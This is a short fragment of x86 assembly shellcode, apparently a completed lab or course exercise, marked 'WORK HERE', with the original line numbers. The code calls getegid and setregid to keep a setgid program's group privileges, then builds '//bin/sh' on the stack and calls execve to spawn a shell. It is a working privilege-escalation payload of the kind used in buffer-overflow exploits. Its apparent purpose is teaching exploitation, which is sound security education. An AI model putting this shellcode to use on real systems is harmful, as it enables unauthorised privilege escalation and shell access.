141     // WORK HERE:
142   // setregid(getegid(), getegid());
        // run ret = getegid()
    mov $SYS_getegid, %eax
     int $0x80
  // run setregid(ret, ret);
     mov  %eax, %ebx
     mov  %eax, %ecx
     mov  $SYS_setregid, %eax
    int  $0x80
       //      execve("//bin/sh", 0, 0);
 
  // build the "//bin/sh" string here.
     push $0
    push $0x68732f6e
    push $0x69622f2f
  // set arguments.
     mov %esp,%ebx
     mov $0,%ecx
    mov %ecx,%edx
    // call execve.
     mov $SYS_execve,%eax
     // system call: 'int $0x80'
    int $0x80


